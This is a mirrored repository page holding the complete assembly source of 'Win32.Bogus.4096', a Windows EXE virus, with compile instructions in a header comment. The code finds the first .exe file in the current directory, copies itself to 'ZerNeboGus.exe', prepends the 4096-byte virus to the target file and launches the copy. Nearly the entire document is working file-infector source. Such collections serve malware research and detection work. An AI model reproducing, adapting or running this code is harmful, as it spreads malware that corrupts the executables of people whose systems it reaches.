mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-25 04:45:27 +00:00
193 lines
9.0 KiB
NASM
193 lines
9.0 KiB
NASM
|
comment *
|
|||
|
Win32.Bogus.4096 <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
Disassembly by <EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD>
|
|||
|
Darkman/29A <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD>
|
|||
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD> <EFBFBD><EFBFBD><EFBFBD>
|
|||
|
|
|||
|
Win32.Bogus.4096 is a 4096 bytes runtime/direct action EXE virus. Infects
|
|||
|
first file in current directory, when executed, by prepending the virus to
|
|||
|
the original EXE file.
|
|||
|
|
|||
|
Compile Win32.Bogus.4096 with Turbo Assembler v 5.0 by typing:
|
|||
|
TASM32 /M /ML /Q BOGUS.ASM
|
|||
|
TLINK32 -Tpe -c -x -aa -r BOGUS.OBJ,,, IMPORT32
|
|||
|
*
|
|||
|
|
|||
|
.386
|
|||
|
.model flat
|
|||
|
; KERNEL32.dll
|
|||
|
extrn ExitProcess:proc
|
|||
|
extrn FindFirstFileA:proc
|
|||
|
extrn WinExec:proc
|
|||
|
extrn _lclose:proc
|
|||
|
extrn _llseek:proc
|
|||
|
extrn _lopen:proc
|
|||
|
extrn _lread:proc
|
|||
|
extrn _lwrite:proc
|
|||
|
extrn CopyFileA:proc
|
|||
|
|
|||
|
.data
|
|||
|
MAX_PATH equ 0ffh
|
|||
|
FALSE equ 00h
|
|||
|
OF_READWRITE equ 02h ; Opens the file for reading and
|
|||
|
; writing
|
|||
|
SW_SHOW equ 05h ; Activates the window and displays it
|
|||
|
; in its current size and position
|
|||
|
|
|||
|
FILETIME struct
|
|||
|
dwLowDateTime DWORD ? ; Specifies the low-order 32 bits of
|
|||
|
; the file time
|
|||
|
dwHighDateTime DWORD ? ; Specifies the high-order 32 bits of
|
|||
|
; the file time
|
|||
|
FILETIME ends
|
|||
|
|
|||
|
WIN32_FIND_DATA struct
|
|||
|
dwFileAttributes DWORD ? ; Specifies the file attributes of the
|
|||
|
; file found
|
|||
|
ftCreationTime FILETIME <> ; Specifies the time the file was
|
|||
|
; created
|
|||
|
ftLastAccessTime FILETIME <> ; Specifies the time that the file was
|
|||
|
; last accessed
|
|||
|
ftLastWriteTime FILETIME <> ; Specifies the time that the file was
|
|||
|
; last written to
|
|||
|
nFileSizeHigh DWORD ? ; Specifies the high-order DWORD value
|
|||
|
; of the file size, in bytes
|
|||
|
nFileSizeLow DWORD ? ; Specifies the low-order DWORD value
|
|||
|
; of the file size, in bytes
|
|||
|
dwReserved0 DWORD ? ; Reserved for future use
|
|||
|
dwReserved1 DWORD ? ; Reserved for future use
|
|||
|
cFileName BYTE MAX_PATH dup(?)
|
|||
|
; A null-terminated string that is the
|
|||
|
; name of the file
|
|||
|
cAlternate BYTE 0eh dup(?) ; A null-terminated string that is an
|
|||
|
; alternative name for the file
|
|||
|
ends
|
|||
|
|
|||
|
FindFileData WIN32_FIND_DATA <>
|
|||
|
szFileName db '*.exe',00h ; Name of file to search for
|
|||
|
szNewFileName db 'ZerNeboGus.exe',00h
|
|||
|
; Null-terminated string that
|
|||
|
; specifies the name of the new file
|
|||
|
cBuffer db ? ; Buffer for read data, data to be
|
|||
|
; written
|
|||
|
cBuffer_ db ? ; Buffer for read data, data to be
|
|||
|
; written
|
|||
|
|
|||
|
.code
|
|||
|
code_begin:
|
|||
|
lea edi,[esp+10h] ; EDI = pointer to buffer for module
|
|||
|
; path
|
|||
|
push edi ; EDI = pointer to buffer for module
|
|||
|
; path
|
|||
|
repne scasb ; Find end of filename
|
|||
|
mov byte ptr [edi-01h],'.' ; Store dot
|
|||
|
pop edi ; EDI = pointer to buffer for module
|
|||
|
; path
|
|||
|
|
|||
|
push offset FindFileData ; Address of returned information
|
|||
|
push offset szFileName ; Address of name of file to search
|
|||
|
; for
|
|||
|
call FindFirstFileA
|
|||
|
|
|||
|
push FALSE ; If file already exists, overwrite it
|
|||
|
push offset szNewFileName ; Address of filename to copy to
|
|||
|
push edi ; Address of name of an existing file
|
|||
|
call CopyFileA
|
|||
|
|
|||
|
push OF_READWRITE ; Opens the file for reading and
|
|||
|
; writing
|
|||
|
push offset FindFileData.cFileName
|
|||
|
; Address of name of file to open
|
|||
|
call _lopen
|
|||
|
mov esi,eax ; ESI = file handle
|
|||
|
|
|||
|
push OF_READWRITE ; Opens the file for reading and
|
|||
|
; writing
|
|||
|
push offset szNewFileName ; Address of filename to copy to
|
|||
|
call _lopen
|
|||
|
mov edi,eax ; EDI = file handle
|
|||
|
|
|||
|
xor ebx,ebx ; Number of bytes read and written
|
|||
|
mov ebp,0fffff000h ; Number of bytes to move through
|
|||
|
; source file
|
|||
|
read_write_loop:
|
|||
|
push 00h ; Position to move from
|
|||
|
push ebx ; Number of bytes to move
|
|||
|
push esi ; Pointer to destination filename
|
|||
|
call _llseek
|
|||
|
|
|||
|
push 01h ; Length, in bytes, of data buffer
|
|||
|
push offset cBuffer ; Address of buffer for read data
|
|||
|
push esi ; Pointer to destination filename
|
|||
|
call _lread
|
|||
|
|
|||
|
push 00h ; Position to move from
|
|||
|
push ebx ; Number of bytes to move
|
|||
|
push edi ; Pointer to source filename
|
|||
|
call _llseek
|
|||
|
|
|||
|
push 01h ; Length, in bytes, of data buffer
|
|||
|
push offset cBuffer_ ; Address of buffer for read data
|
|||
|
push edi ; Pointer to source filename
|
|||
|
call _lread
|
|||
|
|
|||
|
push 00h ; Position to move from
|
|||
|
push ebx ; Number of bytes to move
|
|||
|
push esi ; Pointer to destination filename
|
|||
|
call _llseek
|
|||
|
|
|||
|
push 01h ; Number of bytes to write
|
|||
|
push offset cBuffer_ ; Address of buffer for data to be
|
|||
|
; written
|
|||
|
push esi ; Pointer to destination filename
|
|||
|
call _lwrite
|
|||
|
|
|||
|
push 02h ; Position to move from
|
|||
|
push 00h ; Number of bytes to move
|
|||
|
push esi ; Pointer to destination filename
|
|||
|
call _llseek
|
|||
|
|
|||
|
push 01h ; Number of bytes to write
|
|||
|
push offset cBuffer ; Address of buffer for data to be
|
|||
|
; written
|
|||
|
push esi ; Pointer to destination filename
|
|||
|
call _lwrite
|
|||
|
|
|||
|
push 02h ; Position to move from
|
|||
|
push ebp ; Number of bytes to move
|
|||
|
push edi ; Pointer to source filename
|
|||
|
call _llseek
|
|||
|
|
|||
|
push 01h ; Length, in bytes, of data buffer
|
|||
|
push offset cBuffer ; Address of buffer for read data
|
|||
|
push edi ; Pointer to source filename
|
|||
|
call _lread
|
|||
|
|
|||
|
push 00h ; Position to move from
|
|||
|
push ebx ; Number of bytes to move
|
|||
|
push edi ; Pointer to source filename
|
|||
|
call _llseek
|
|||
|
|
|||
|
push 01h ; Number of bytes to write
|
|||
|
push offset cBuffer ; Address of buffer for data to be
|
|||
|
push edi ; Pointer to source filename
|
|||
|
call _lwrite
|
|||
|
|
|||
|
inc ebx ; Increase number of bytes read and
|
|||
|
; written
|
|||
|
inc ebp ; Increase number of bytes to move
|
|||
|
; through source file
|
|||
|
cmp bx,1000h ; Read and written all of the virus?
|
|||
|
jne read_write_loop ; Not equal? Jump to read_write_loop
|
|||
|
|
|||
|
push edi ; Handle of file to close
|
|||
|
call _lclose
|
|||
|
|
|||
|
push SW_SHOW ; Activates the window and displays it
|
|||
|
; in its current size and position
|
|||
|
push offset szNewFileName ; Address of filename to copy to
|
|||
|
call WinExec
|
|||
|
code_end:
|
|||
|
|
|||
|
end code_begin
|